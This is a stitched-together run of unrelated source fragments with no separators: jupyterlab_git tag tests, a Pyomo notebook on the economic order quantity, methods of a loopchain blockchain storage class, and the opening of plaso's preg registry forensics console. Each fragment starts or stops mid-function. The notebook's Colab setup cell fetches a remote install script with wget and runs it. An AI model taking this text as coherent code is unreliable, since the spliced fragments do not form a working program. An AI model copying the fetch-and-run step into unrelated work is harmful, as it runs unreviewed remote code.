"Error [fatal: Not a valid object name blah] "
"occurred while executing [git describe --tags blah] command to get nearest tag associated with branch."
== str(error.value)
)
actual_response = await Git()._get_tag(
path=str(Path("/bin/test_curr_path")),
commit_sha="01234567899999abcdefghijklmnopqrstuvwxyz",
)
assert actual_response is None
# Then
mock_execute.assert_has_calls(
[
call(
["git", "describe", "--tags", "blah"],
cwd=str(Path("/bin") / "test_curr_path"),
),
call(
[
"git",
"describe",
"--tags",
"01234567899999abcdefghijklmnopqrstuvwxyz",
],
cwd=str(Path("/bin") / "test_curr_path"),
),
],
any_order=False,
)
@pytest.mark.asyncio
async def test_no_tags():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.return_value = maybe_future(
(128, "", "fatal: No names found, cannot describe anything.\n")
)
# When
actual_response = await Git()._get_tag(
"/path/foo", "768c79ad661598889f29bdf8916f4cc488f5062a"
)
# Then
mock_execute.assert_called_once_with(
["git", "describe", "--tags", "768c79ad661598889f29bdf8916f4cc488f5062a"],
cwd="/path/foo",
)
assert actual_response is None
@pytest.mark.asyncio
async def test_branch_success():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
#!/usr/bin/env python
# coding: utf-8
# # Economic Order Quantity
#
# * Demonstrates reformulation of hyperbolic constraints as SOCP and its implementation with `pyomo.kernel.conic.quadratic`.
# * Demonstrates direct modeling of the hyperbolic constraint with `pyomo.kernel.conic.rotated_quadratic`.
# * The example is familiar to any MBA/business student, and has a significant range of applications including warehouse operations.
#
# ## Usage notes
#
# * The notebook requires a solver that can handle a conic constraint. Pyomo provides direct interfaces to the commercial solvers Gurobi and Mosek, which include conic solvers. Other nonlinear solvers may solve this problem using more general numerical techniques.
# * On Google Colab use the `gurobi_direct` solver to use the demo version of Gurobi that is included with Google Colab. Note there are size limits for problems using the demo version of Gurobi.
# * For personal installations of Mosek or Gurobi (free licenses available for academic use), use `mosek_direct` or `gurobi_direct`.
# * For use without Gurobi or Mosek, use the `ipopt` solver.
# In[1]:
# Install Pyomo and solvers for Google Colab
import sys
if "google.colab" in sys.modules:
get_ipython().system('wget -N -q https://raw.githubusercontent.com/jckantor/MO-book/main/tools/install_on_colab.py ')
get_ipython().run_line_magic('run', 'install_on_colab.py')
# ## Bibliographic notes
#
# The original formulation and solution of the economic order quantity problem is attributed to Ford W. Harris, but in a curious twist has been [incorrectly cited since 1931](https://pubsonline.informs.org/doi/abs/10.1287/mnsc.35.7.898). The correct citation is:
#
# > Harris, F. W. (1915). Operations and Cost (Factory Management Series). A. W. Shaw Company, Chap. IV, pp. 48-52. Chicago.
#
# Harris later developed an extensive consulting business and the concept has become embedded in business practice for over 100 years. Harris's single item model was later extended to multiple items sharing a resource constraint. There may be earlier citations, but this model is generally attributed to Ziegler (1982):
#
# > Ziegler, H. (1982). Solving certain singly constrained convex optimization problems in production planning. Operations Research Letters, 1(6), 246-252.
#
# > Bretthauer, K. M., & Shetty, B. (1995). The nonlinear resource allocation problem. Operations Research, 43(4), 670-683. https://www.jstor.org/stable/171693?seq=1
#
# Reformulation of the multi-item EOQ model as a conic program is attributed to Kuo and Mittelmann (2004) using techniques described by Lobo, et al. (1998):
#
# > Kuo, Y.-J., & Mittelmann, H. D. (2004). Interior point methods for second-order cone programming and OR applications. Computational Optimization and Applications, 28(3), 255-285. https://link.springer.com/content/pdf/10.1023/B:COAP.0000033964.95511.23.pdf
#
# > Lobo, M. S., Vandenberghe, L., Boyd, S., & Lebret, H. (1998). Applications of second-order cone programming. Linear Algebra and its Applications, 284(1-3), 193-228. https://web.stanford.edu/~boyd/papers/pdf/socp.pdf
#
# The multi-item model has been used didactically many times since 2004. These are representative examples:
#
# > <NAME>., & <NAME>. (2018). A guide to conic optimisation and its applications. RAIRO-Operations Research, 52(4-5), 1087-1106. http://www.cs.nott.ac.uk/~pszajp/pubs/conic-guide.pdf
#
# > El Ghaoui, Laurent (2018). Lecture notes on Optimization Models. https://inst.eecs.berkeley.edu/~ee127/fa19/Lectures/12_socp.pdf
#
# > Mosek Modeling Cookbook, section 3.3.5. https://docs.mosek.com/modeling-cookbook/cqo.html.
#
# ## EOQ Model
#
# ### Classical formulation
#
# The economic order quantity (EOQ) is a classical problem in inventory management attributed to Ford Harris (1915). The problem is to find the order size that minimizes the cost of maintaining that item in inventory.
#
# The cost $f(x)$ of maintaining an item in inventory given an order size $x$ is
#
# $$f(x) = \frac{h x}{2} + \frac{c d}{x}$$
#
# where $h$ is the annual cost of holding an item including any financing charges, $c$ is the fixed cost of placing and receiving an order, and $d$ is the annual demand. The factor $\frac{1}{2}$ results from demand depleting the inventory at a constant rate over the year. The economic order quantity is the value of $x$ minimizing $f(x)$
#
# $$
# \begin{align*}
# EOQ = \arg\min_x\ & f(x) = \frac{h x}{2} + \frac{c d}{x} \\
# \text{s.t.}\quad x & > 0 \\
# \end{align*}
# $$
#
# The solution to this problem is found by setting the derivative of $f(x)$ equal to zero.
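#
# Explicitly,
#
# $$f'(x) = \frac{h}{2} - \frac{c d}{x^2} = 0 \quad\Longrightarrow\quad x^2 = \frac{2 c d}{h},$$
#
# so that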
#
# $$
# \begin{align*}
# EOQ = x^{opt} & = \sqrt{\frac{2 c d}{h}} \\
# f^{opt} & = \sqrt{2 c d h}
# \end{align*}
# $$
#
# The following chart illustrates the nature of the problem and its analytical solution.
# In[2]:
import matplotlib.pyplot as plt
import numpy as np
h = 0.75 # cost of holding one item for one year
c = 500.0 # cost of processing one order
d = 10000.0 # annual demand
eoq = np.sqrt(2*c*d/h)
fopt = np.sqrt(2*c*d*h)
print(f"Optimal order size = {eoq:0.1f} items with cost {fopt:0.2f}")
x = np.linspace(100, 10000, 1000)
f = h*x/2 + c*d/x
fig, ax = plt.subplots(figsize=(10, 6))
ax.plot(x, f, lw=3, label="total cost")
ax.plot(x, h*x/2, '--', lw=1, label="holding costs")
ax.plot(x, c*d/x, '--', lw=1, label="ordering costs")
ax.set_xlabel("x = order size")
ax.set_ylabel("cost")
ax.plot(eoq, fopt, 'ro', ms=10, label="EOQ")
ax.legend(loc='lower right')
ax.annotate(f"EOQ = {eoq:0.2f}", xy=(eoq, 0), xytext=(1.2*eoq, 0.2*fopt),
arrowprops=dict(facecolor="black", shrink=0.15, width=1, headwidth=6))
ax.plot([eoq, eoq, 0], [0, fopt, fopt], 'r--')
ax.set_xlim(0, 10000)
ax.set_ylim(0, 6000)
# ### Reformulating EOQ as a linear objective with hyperbolic constraint
#
# The optimization objective is linearized with the use of a second decision variable $y = 1/x$. The optimization problem is now a linear objective in two decision variables with a hyperbolic constraint $xy \geq 1$.
#
# $$
# \begin{align*}
# \min_{x, y}\ & f(x, y) = \frac{h x}{2} + c d y \\
# \text{s.t.}\quad x\,y & \geq 1 \\
# x, y & > 0 \\
# \end{align*}
# $$
#
# The following diagram illustrates the solution to this optimization problem.
#
# In[3]:
import matplotlib.pyplot as plt
import numpy as np
h = 0.75 # cost of holding one item for one year
c = 500.0 # cost of processing one order
d = 10000.0 # annual demand
x = np.linspace(100, 8000)
eoq = np.sqrt(2*c*d/h)
fopt = np.sqrt(2*c*d*h)
yopt = (fopt - h*eoq/2)/(c*d)
fig, ax = plt.subplots(figsize=(10, 6))
ax.plot(x, 1/x, lw=3, label="x y = 1")
ax.plot(x, (fopt - h*x/2)/(c*d), 'g', lw=3)
for f in fopt*np.linspace(0, 3, 11):
ax.plot(x, (f - h*x/2)/(c*d), 'g--', alpha=0.5)
ax.plot(eoq, yopt, 'ro', ms=10)
ax.annotate(f"EOQ = {eoq:0.2f}", xy=(eoq, 0), xytext=(1.2*eoq, 0.2*yopt),
arrowprops=dict(facecolor="black", shrink=0.15, width=1, headwidth=6))
ax.annotate("", xytext=(4800, 0.0006), xy=(4000, 1/3000),
arrowprops=dict(facecolor="black", shrink=0.05, width=1, headwidth=6))
ax.text(4800, .0005, "decreasing objective")
ax.fill_between(x, 1/x, 0.0008, alpha=0.2, label="x y > 1")
ax.plot([eoq, eoq], [0, yopt], 'r--')
ax.set_xlim(0, 8000)
ax.set_ylim(0, .0008)
ax.set_xlabel('x = order size')
ax.set_ylabel('y')
ax.set_title("EOQ reformulation as linear objective with a hyperbolic constraint")
ax.legend()
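#
# As a minimal sketch, the reformulated problem can also be solved directly as a nonlinear program with Pyomo's high-level `pyomo.environ` interface and the `ipopt` solver (any solver from the usage notes would work; the model and variable names below are illustrative, and `h`, `c`, `d` are taken from the cells above).
# In[ ]:
import pyomo.environ as pyo

# linear objective with the hyperbolic constraint x*y >= 1
nlp = pyo.ConcreteModel()
nlp.x = pyo.Var(bounds=(1e-6, None))   # order size
nlp.y = pyo.Var(bounds=(1e-6, None))   # stands in for 1/x
nlp.hyperbola = pyo.Constraint(expr=nlp.x * nlp.y >= 1)
nlp.cost = pyo.Objective(expr=h * nlp.x / 2 + c * d * nlp.y, sense=pyo.minimize)

pyo.SolverFactory("ipopt").solve(nlp)
print(f"EOQ = {pyo.value(nlp.x):0.1f}")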
# ## Reformulating EOQ as a linear objective with second order cone constraint
#
# Given that a hyperbola results from the intersection of a plane with a cone, the hyperbola described by the constraint $x y \geq 1$ invites the question of whether there is another reformulation of EOQ with a cone constraint.
#
# The following diagram draws the intersection of a plane with a Lorentz cone. The Lorentz cone is defined by
#
# $$
# \begin{align*}
# C & = \{ (z, t)\in\mathbb{R}^3 \ | \ \| z \|_2 \leq t \}
# \end{align*}
# $$
#
# where the components of $z$ are given by
#
# $$z = \begin{bmatrix} u \\ v \end{bmatrix}$$
#
# The intersection of the cone with a plane aligned with the $t$ axis exactly describes a hyperbola. As described by Lobo, et al. (1998), the correspondence is given by
#
# $$w^2 \leq x y,\ x, y\geq 0,\ \iff \|\begin{bmatrix} 2w \\ x-y \end{bmatrix} \|_2 \leq x + y $$
#
# where the axes in the $w, x, y$ coordinates are tilted, displaced, and stretched compared to the coordinates shown in the diagram. The exact correspondence to the diagram is given by
#
# $$\begin{align*}
# u & \sim 2 w \\
# v & \sim x - y \\
# t & \sim x + y
# \end{align*}$$
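#
# As a sketch of the direct conic model, the correspondence above lets the constraint $x y \geq 1$ be written with `pyomo.kernel.conic.rotated_quadratic`, which encodes $\sum_i z_i^2 \leq 2 r_1 r_2$: fixing an auxiliary variable $w = \sqrt{2}$ gives $w^2 \leq 2 x y \iff x y \geq 1$. This assumes a conic-capable solver such as Mosek is installed; the names below are illustrative.
# In[ ]:
import pyomo.kernel as pmo

m = pmo.block()
m.x = pmo.variable(lb=0)   # order size
m.y = pmo.variable(lb=0)   # surrogate for 1/x
m.w = pmo.variable()       # fixed so that w**2 <= 2*x*y  <=>  x*y >= 1
m.w.fix(2**0.5)
m.cone = pmo.conic.rotated_quadratic(r1=m.x, r2=m.y, x=[m.w])
m.cost = pmo.objective(h * m.x / 2 + c * d * m.y)

pmo.SolverFactory("mosek_direct").solve(m)
print(f"EOQ = {m.x():0.1f}")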
# In[4]:
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits import mplot3d
import mpl_toolkits.mplot3d.art3d as art3d
from matplotlib.patches import Rectangle
t_max = 4
w = 2
n = 40
fig = plt.figure(figsize=(10, 10))
ax = plt.axes(projection='3d')
for t in np.linspace(0, t_max, n+1):
if t < w:
a = np.linspace(0, 2*np.pi, 30)
u = t*np.cos(a)
v = t*np.sin(a)
ax.plot3D(u, v, t, 'b', lw=0.3)
else:
b = np.arccos(w/t)
a = np.linspace(b, 2*np.pi-b, 30)
u = t*np.cos(a)
v = t*np.sin(a)
ax.plot3D(u, v, t, 'b', lw=0.3)
ax.plot3D([2, 2], [t*np.sin(b), -t*np.sin(b)], [t, t], 'b', lw=0.3)
t = np.linspace(w, t_max)
v = t*np.sin(np.arccos(w/t))
u = w*np.array([1]*len(t))
ax.plot3D(u, v, t, 'b')
ax.plot3D(u, -v, t, 'b')
ax.plot3D([0, t_max + 0.5], [0, 0], [0, 0], 'k', lw=3, alpha=0.4)
ax.plot3D([0, 0], [0, t_max + 1], [0, 0], 'k', lw=3, alpha=0.4)
ax.plot3D([0, 0], [0, 0], [0, t_max + 1], 'k', lw=3, alpha=0.4)
tuple([prep["id"] for prep in preps])
@lru_cache(maxsize=4)
def find_preps_addresses_by_roothash(self, roothash: Hash32) -> Tuple[ExternalAddress, ...]:
preps_ids = self.find_preps_ids_by_roothash(roothash)
return tuple([ExternalAddress.fromhex(prep_id) for prep_id in preps_ids])
@lru_cache(maxsize=4)
def find_preps_targets_by_roothash(self, roothash: Hash32) -> Mapping[str, str]:
preps = self.find_preps_by_roothash(roothash)
return MappingProxyType({prep["id"]: prep["p2pEndpoint"] for prep in preps})
def __cache_clear_roothash(self):
self.find_preps_ids_by_roothash.cache_clear()
self.find_preps_addresses_by_roothash.cache_clear()
self.find_preps_targets_by_roothash.cache_clear()
@staticmethod
def get_reps_hash_by_header(header: BlockHeader) -> Hash32:
try:
roothash = header.reps_hash
if not roothash:
raise AttributeError
except AttributeError:
roothash = ChannelProperty().crep_root_hash
return roothash
@staticmethod
def get_next_reps_hash_by_header(header: BlockHeader) -> Hash32:
try:
roothash = header.revealed_next_reps_hash
if not roothash:
raise AttributeError
except AttributeError:
            # TODO: Re-locate roothash under BlockHeader or somewhere, without using ObjectManager
roothash = ChannelProperty().crep_root_hash
return roothash
def find_preps_ids_by_header(self, header: BlockHeader) -> Sequence[str]:
return self.find_preps_ids_by_roothash(self.get_reps_hash_by_header(header))
def find_preps_addresses_by_header(self, header: BlockHeader) -> Sequence[ExternalAddress]:
return self.find_preps_addresses_by_roothash(self.get_reps_hash_by_header(header))
def find_preps_by_roothash(self, roothash: Hash32) -> list:
try:
preps_dumped = bytes(self._blockchain_store.get(BlockChain.PREPS_KEY + roothash))
except (KeyError, TypeError):
return []
else:
return json.loads(preps_dumped)
@valued_only_lru_cache(maxsize=4, valued_returns_only=True)
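    # Caches only non-None results, so a roothash that is missing from the DB
    # is re-checked on the next call instead of being cached as absent.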
def is_roothash_exist_in_db(self, roothash: Hash32) -> Optional[bool]:
try:
self._blockchain_store.get(BlockChain.PREPS_KEY + roothash)
except (KeyError, TypeError):
return None
else:
return True
def write_preps(self, roothash: Hash32, preps: list, batch: KeyValueStoreWriteBatch = None):
write_target = batch or self._blockchain_store
write_target.put(
BlockChain.PREPS_KEY + roothash,
json.dumps(preps).encode(encoding=conf.PEER_DATA_ENCODING)
)
    # TODO: The current Citizen node syncs via the announce_confirmed_block message.
    #  However, this message does not include voting information.
    #  That should be changed, and the default None parameter here removed.
def add_block(self,
block: Block,
confirm_info=None,
need_to_write_tx_info=True,
need_to_score_invoke=True) -> bool:
"""
:param block:
        :param confirm_info: additional info for this block; it comes from the next block of this block.
:param need_to_write_tx_info:
:param need_to_score_invoke:
:return:
"""
with self.__add_block_lock:
if need_to_write_tx_info and need_to_score_invoke and \
not self.prevent_next_block_mismatch(block.header.height):
return True
return self.__add_block(block, confirm_info, need_to_write_tx_info, need_to_score_invoke)
def __add_block(self, block: Block, confirm_info, need_to_write_tx_info=True, need_to_score_invoke=True):
with self.__add_block_lock:
channel_service = ObjectManager().channel_service
receipts, next_prep = self.__invoke_results.get(block.header.hash, (None, None))
if receipts is None and need_to_score_invoke:
self.get_invoke_func(block.header.height)(block, self.__last_block)
receipts, next_prep = self.__invoke_results.get(block.header.hash, (None, None))
if not need_to_write_tx_info:
receipts = None
if next_prep and self.find_preps_addresses_by_roothash(
Hash32.fromhex(next_prep['rootHash'], ignore_prefix=True)):
next_prep = None
next_total_tx = self.__write_block_data(block, confirm_info, receipts, next_prep)
try:
if need_to_score_invoke:
channel_service.score_write_precommit_state(block)
except Exception as e:
utils.exit_and_msg(f"score_write_precommit_state FAIL {e}")
self.__invoke_results.pop(block.header.hash, None)
self._increase_made_block_count(block) # must do this before self.__last_block = block
self.__last_block = block
self.__total_tx = next_total_tx
self.__block_manager.new_epoch()
logging.info(
f"BLOCK HEIGHT : {block.header.height}, "
f"VERSION : {block.header.version}, "
f"HASH : {block.header.hash.hex()}, "
f"CHANNEL : {self.__channel_name}")
utils.logger.debug(f"ADDED BLOCK HEADER : {block.header}")
if conf.RECOVERY_MODE:
from loopchain.tools.recovery import Recovery
utils.logger.debug(f"release recovery_mode block height : {Recovery.release_block_height()}")
if (channel_service.state_machine.state in ('Vote', 'BlockSync')
and block.header.height >= Recovery.release_block_height()):
conf.RECOVERY_MODE = False
logging.info(f"recovery mode released at {block.header.height}")
if not (conf.SAFE_BLOCK_BROADCAST and channel_service.state_machine.state == 'BlockGenerate'):
channel_service.inner_service.notify_new_block()
channel_service.reset_leader(new_leader_id=self.__block_manager.epoch.leader_id)
if block.header.prep_changed and channel_service.state_machine.state != 'BlockSync':
# reset_network_by_block_height is called in critical section by self.__add_block_lock.
# Other Blocks must not be added until reset_network_by_block_height function finishes.
channel_service.switch_role()
return True
def _write_tx(self, block, receipts, batch=None):
"""save additional information of transactions to efficient searching and support user APIs.
:param block:
:param receipts: invoke result of transaction
:param batch:
:return:
"""
write_target = batch or self._blockchain_store
# loop all tx in block
logging.debug("try add all tx in block to block db, block hash: " + block.header.hash.hex())
tx_queue = self.__block_manager.get_tx_queue()
for index, tx in enumerate(block.body.transactions.values()):
tx_hash = tx.hash.hex()
receipt = receipts[tx_hash]
tx_serializer = TransactionSerializer.new(tx.version, tx.type(), self.__tx_versioner)
tx_info = {
'block_hash': block.header.hash.hex(),
'block_height': block.header.height,
'tx_index': hex(index),
'transaction': tx_serializer.to_db_data(tx),
'result': receipt
}
write_target.put(
tx_hash.encode(encoding=conf.HASH_KEY_ENCODING),
json.dumps(tx_info).encode(encoding=conf.PEER_DATA_ENCODING))
tx_queue.pop(tx_hash, None)
if block.header.height > 0:
self._write_tx_by_address(tx, batch)
# save_invoke_result_block_height
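        # Store the height as a minimal big-endian byte string;
        # (bit_length + 7) // 8 rounds up to the fewest whole bytes needed.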
bit_length = block.header.height.bit_length()
byte_length = (bit_length + 7) // 8
block_height_bytes = block.header.height.to_bytes(byte_length, byteorder='big')
write_target.put(
BlockChain.INVOKE_RESULT_BLOCK_HEIGHT_KEY,
block_height_bytes
)
def __write_block_data(self, block: Block, confirm_info, receipts, next_prep):
        # A condition for the exceptional case of the genesis block.
next_total_tx = self.__total_tx
if block.header.height > 0:
next_total_tx += len(block.body.transactions)
bit_length = next_total_tx.bit_length()
byte_length = (bit_length + 7) // 8
next_total_tx_bytes = next_total_tx.to_bytes(byte_length, byteorder='big')
block_serializer = BlockSerializer.new(block.header.version, self.__tx_versioner)
block_serialized = json.dumps(block_serializer.serialize(block))
block_hash_encoded = block.header.hash.hex().encode(encoding='UTF-8')
batch = self._blockchain_store.WriteBatch()
batch.put(block_hash_encoded, block_serialized.encode("utf-8"))
batch.put(BlockChain.LAST_BLOCK_KEY, block_hash_encoded)
batch.put(BlockChain.TRANSACTION_COUNT_KEY, next_total_tx_bytes)
batch.put(
BlockChain.BLOCK_HEIGHT_KEY +
block.header.height.to_bytes(conf.BLOCK_HEIGHT_BYTES_LEN, byteorder='big'),
block_hash_encoded)
if receipts:
self._write_tx(block, receipts, batch)
if next_prep:
utils.logger.spam(
f"store next_prep\nprep_hash({next_prep['rootHash']})"
f"\npreps({next_prep['preps']})")
self.write_preps(Hash32.fromhex(next_prep['rootHash'], ignore_prefix=True), next_prep['preps'], batch)
if confirm_info:
if isinstance(confirm_info, list):
votes_class = Votes.get_block_votes_class(block.header.version)
confirm_info = json.dumps(votes_class.serialize_votes(confirm_info))
if isinstance(confirm_info, str):
confirm_info = confirm_info.encode('utf-8')
batch.put(
BlockChain.CONFIRM_INFO_KEY + block_hash_encoded,
confirm_info
)
else:
utils.logger.debug(f"This block({block.header.hash}) is trying to add without confirm_info.")
if self.__last_block and self.__last_block.header.prev_hash:
# Delete confirm info to avoid data duplication.
block_hash_encoded = self.__last_block.header.prev_hash.hex().encode("utf-8")
block_confirm_info_key = BlockChain.CONFIRM_INFO_KEY + block_hash_encoded
batch.delete(block_confirm_info_key)
batch.write()
return next_total_tx
def prevent_next_block_mismatch(self, next_height: int) -> bool:
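        """Keep the score (execution engine) block height consistent with the chain.

        Re-invokes any blocks the score has not yet processed. Returns True when
        the block at next_height still needs to be written, False when its data
        is already stored.
        """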
logging.debug(f"next_height: {next_height}")
score_stub = StubCollection().icon_score_stubs[self.__channel_name]
request = {
"method": "ise_getStatus",
"params": {"filter": ["lastBlock"]}
}
response = score_stub.sync_task().query(request)
score_last_block_height = int(response['lastBlock']['blockHeight'], 16)
if score_last_block_height < next_height:
for invoke_block_height in range(score_last_block_height + 1, next_height):
logging.debug(f"mismatch invoke_block_height({invoke_block_height}) "
f"score_last_block_height({score_last_block_height}) "
f"next_block_height({next_height})")
invoke_block = self.find_block_by_height(invoke_block_height)
if invoke_block is None:
raise RuntimeError("Error raised during prevent mismatch block, "
f"Cannot find block({invoke_block_height}")
if invoke_block.header.height > 0:
prev_invoke_block = self.find_block_by_height(invoke_block_height - 1)
if prev_invoke_block is None:
raise RuntimeError("Error raised during prevent mismatch block, "
f"Cannot find prev_block({invoke_block_height - 1}")
else:
prev_invoke_block = None
invoke_block, receipts = \
self.get_invoke_func(invoke_block_height)(invoke_block, prev_invoke_block)
self._write_tx(invoke_block, receipts)
try:
ObjectManager().channel_service.score_write_precommit_state(invoke_block)
except Exception as e:
utils.exit_and_msg(f"Fail to write precommit in the score.: {e}")
return True
elif score_last_block_height == next_height:
logging.debug(f"already invoked block in score...")
return False
elif score_last_block_height == next_height + 1:
try:
invoke_result_block_height_bytes = \
self._blockchain_store.get(BlockChain.INVOKE_RESULT_BLOCK_HEIGHT_KEY)
invoke_result_block_height = int.from_bytes(invoke_result_block_height_bytes, byteorder='big')
if invoke_result_block_height == next_height:
logging.debug("already saved invoke result...")
return False
except KeyError:
logging.debug("There is no invoke result height in db.")
else:
# score_last_block_height is two or more higher than loopchain_last_block_height.
utils.exit_and_msg("Too many different(over 2) of block height between the loopchain and score. "
"Peer will be down. : "
f"loopchain({next_height})/score({score_last_block_height})")
return True
def _write_tx_by_address(self, tx: 'Transaction', batch):
if tx.type() == "base":
return
address = tx.from_address.hex_hx()
return self.add_tx_to_list_by_address(address, tx.hash.hex(), batch)
@staticmethod
def __get_tx_list_key(address, index):
return conf.TX_LIST_ADDRESS_PREFIX + (address + str(index)).encode(encoding=conf.HASH_KEY_ENCODING)
def get_tx_list_by_address(self, address, index=0):
list_key = self.__get_tx_list_key(address, index)
try:
tx_list = pickle.loads(self._blockchain_store.get(list_key))
next_index = tx_list[-1]
except KeyError:
tx_list = [0] # 0 means there is no more list after this.
next_index = 0
return tx_list, next_index
def find_nid(self):
try:
if self.__nid is not None:
return self.__nid
nid = self._blockchain_store.get(BlockChain.NID_KEY)
self.__nid = nid.decode(conf.HASH_KEY_ENCODING)
return self.__nid
except KeyError as e:
logging.debug(f"There is no NID.")
return None
def add_tx_to_list_by_address(self, address, tx_hash, batch=None):
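        # Per-address tx hashes are stored as chained pages: each stored list's
        # last element is the index of the next (older) page, and 0 marks the end.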
write_target = batch or self._blockchain_store
current_list, current_index = self.get_tx_list_by_address(address, 0)
if len(current_list) > conf.MAX_TX_LIST_SIZE_BY_ADDRESS:
new_index = current_index + 1
new_list_key = self.__get_tx_list_key(address, new_index)
self._blockchain_store.put(new_list_key, pickle.dumps(current_list))
current_list = [new_index]
current_list.insert(0, tx_hash)
list_key = self.__get_tx_list_key(address, 0)
write_target.put(list_key, pickle.dumps(current_list))
return True
def find_tx_by_key(self, tx_hash_key):
"""find tx by hash
:param tx_hash_key: tx hash
        :return: the transaction object, or None if there is no tx for the hash.
"""
try:
tx_info_json = self.find_tx_info(tx_hash_key)
except KeyError as e:
return None
if tx_info_json is None:
logging.warning(f"tx not found. tx_hash ({tx_hash_key})")
return None
tx_data = tx_info_json["transaction"]
tx_version, tx_type = self.__tx_versioner.get_version(tx_data)
tx_serializer = TransactionSerializer.new(tx_version, tx_type, self.__tx_versioner)
return tx_serializer.from_(tx_data)
def find_invoke_result_by_tx_hash(self, tx_hash: Union[str, Hash32]):
"""find invoke result matching tx_hash and return result if not in blockchain return code delay
:param tx_hash: tx_hash
:return: {"code" : "code", "error_message" : "error_message if not fail this is not exist"}
"""
if isinstance(tx_hash, Hash32):
tx_hash = tx_hash.hex()
try:
tx_info = self.find_tx_info(tx_hash)
except KeyError as e:
if tx_hash in self.__block_manager.get_tx_queue():
# this case is tx pending
logging.debug(f"pending tx({tx_hash})")
return {'code': ScoreResponse.NOT_INVOKED}
else:
logging.debug(f"KeyError: {e!r}")
# This transaction is considered a failure.
return {'code': ScoreResponse.NOT_EXIST}
return tx_info['result']
def find_tx_info(self, tx_hash_key: Union[str, Hash32]):
if isinstance(tx_hash_key, Hash32):
tx_hash_key = tx_hash_key.hex()
try:
tx_hash: bytes = tx_hash_key.encode(encoding=conf.HASH_KEY_ENCODING)
tx_info = self._blockchain_store.get(tx_hash)
if tx_info == b'':
raise PrunedHashDataError(prefix="Tx", _hash=tx_hash)
tx_info_json = json.loads(tx_info, encoding=conf.PEER_DATA_ENCODING)
except UnicodeDecodeError as e:
logging.warning(f"UnicodeDecodeError: {e!r}")
return None
return tx_info_json
def __add_genesis_block(self, tx_info: dict, reps: List[ExternalAddress]):
"""
:param tx_info: Transaction data for making genesis block from an initial file
:return:
"""
logging.info("Make Genesis Block....")
tx_builder = TransactionBuilder.new("genesis", "", self.__tx_versioner)
nid = tx_info.get("nid")
if nid is not None:
nid = int(nid, 16)
tx_builder.nid = nid # Optional. It will be 0x3 except for mainnet and testnet if not defined
tx_builder.accounts = tx_info["accounts"]
tx_builder.message = tx_info["message"]
tx = tx_builder.build(False)
block_version = self.block_versioner.get_version(0)
block_builder = BlockBuilder.new(block_version, self.__tx_versioner)
block_builder.height = 0
block_builder.fixed_timestamp = utils.get_now_time_stamp()
block_builder.next_leader = ExternalAddress.fromhex(self.__peer_id)
block_builder.transactions[tx.hash] = tx
        block_builder.reps = reps
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Interactive Windows Registry analysis tool.
preg is an interactive Windows Registry analysis tool that utilizes
plaso Windows Registry parser plugins, dfwinreg Windows Registry and
dfvfs storage media image capabilities.
"""
from __future__ import print_function
from __future__ import unicode_literals
import locale
import sys
import IPython
from dfvfs.lib import definitions as dfvfs_definitions
# pylint: disable=import-error
# pylint: disable=no-name-in-module
try:
# Support version 1.x of IPython.
from IPython.terminal.embed import InteractiveShellEmbed
except ImportError:
from IPython.frontend.terminal.embed import InteractiveShellEmbed
from IPython.config.loader import Config
from IPython.core import magic
from plaso.cli import tools as cli_tools
from plaso.cli import views as cli_views
from plaso.lib import errors
from plaso.lib import timelib
from l2tpreg import helper
from l2tpreg import hexdump
from l2tpreg import plugin_list
from l2tpreg import preg_tool
# Older versions of IPython don't have a version_info attribute.
if getattr(IPython, 'version_info', (0, 0, 0)) < (1, 2, 1):
raise ImportWarning(
'Preg requires at least IPython version 1.2.1.')
@magic.magics_class
class PregMagics(magic.Magics):
"""Preg iPython magics."""
# Needed to give the magic class access to the front end tool
# for processing and formatting.
console = None
REGISTRY_KEY_PATH_SEPARATOR = '\\'
# TODO: move into helper.
REGISTRY_FILE_BASE_PATH = '\\'
# TODO: Use the output writer from the tool.
output_writer = cli_tools.StdoutOutputWriter()
def _HiveActionList(self, unused_line):
"""Handles the hive list action.
Args:
      line (str): command line provided via the console.
"""
self.console.PrintRegistryFileList()
self.output_writer.Write('\n')
self.output_writer.Write(
'To open a Registry file, use: hive open INDEX\n')
def _HiveActionOpen(self, line):
"""Handles the hive open action.
Args:
      line (str): command line provided via the console.
"""
try:
registry_file_index = int(line[5:], 10)
except ValueError:
self.output_writer.Write(
'Unable to open Registry file, invalid index number.\n')
return
try:
self.console.LoadRegistryFile(registry_file_index)
except errors.UnableToLoadRegistryHelper as exception:
self.output_writer.Write(
'Unable to load hive, with error: {0:s}.\n'.format(exception))
return
registry_helper = self.console.current_helper
self.output_writer.Write('Opening hive: {0:s} [{1:s}]\n'.format(
registry_helper.path, registry_helper.collector_name))
self.console.SetPrompt(registry_file_path=registry_helper.path)
def _HiveActionScan(self, line):
"""Handles the hive scan action.
Args:
      line (str): command line provided via the console.
"""
# Line contains: "scan REGISTRY_TYPES" where REGISTRY_TYPES is a comma
# separated list.
registry_file_type_string = line[5:]
if not registry_file_type_string:
registry_file_types = self.console.preg_tool.GetRegistryTypes()
else:
registry_file_types = [
string.strip() for string in registry_file_type_string.split(',')]
registry_helpers = self.console.preg_tool.GetRegistryHelpers(
self.console.preg_tool.artifacts_registry,
registry_file_types=registry_file_types)
for registry_helper in registry_helpers:
self.console.AddRegistryHelper(registry_helper)
self.console.PrintRegistryFileList()
def _PrintPluginHelp(self, plugin_object):
"""Prints the help information of a plugin.
Args:
plugin_object (WindowsRegistryPlugin): a Windows Registry plugin.
"""
table_view = cli_views.CLITableView(title=plugin_object.NAME)
# TODO: replace __doc__ by DESCRIPTION.
description = plugin_object.__doc__
table_view.AddRow(['Description', description])
self.output_writer.Write('\n')
for registry_key in plugin_object.expanded_keys:
table_view.AddRow(['Registry Key', registry_key])
table_view.Write(self.output_writer)
def _SanitizeKeyPath(self, key_path):
"""Sanitizes a Windows Registry key path.
Args:
key_path (str): Windows Registry key path.
Returns:
str: sanitized Windows Registry key path.
"""
key_path = key_path.replace('}', '}}')
key_path = key_path.replace('{', '{{')
return key_path.replace('\\', '\\\\')
@magic.line_magic('cd')
def ChangeDirectory(self, key_path):
"""Change between Registry keys, like a directory tree.
The key path can either be an absolute path or a relative one.
    Relative paths can use '.' and '..' to denote current and parent
directory/key path. If no key path is set the current key is changed
to point to the root key.
Args:
key_path (str): Windows Registry key path to change to.
"""
    if not self.console or not self.console.IsLoaded():
return
registry_helper = self.console.current_helper
if not registry_helper:
return
registry_key = registry_helper.ChangeKeyByPath(key_path)
if not registry_key:
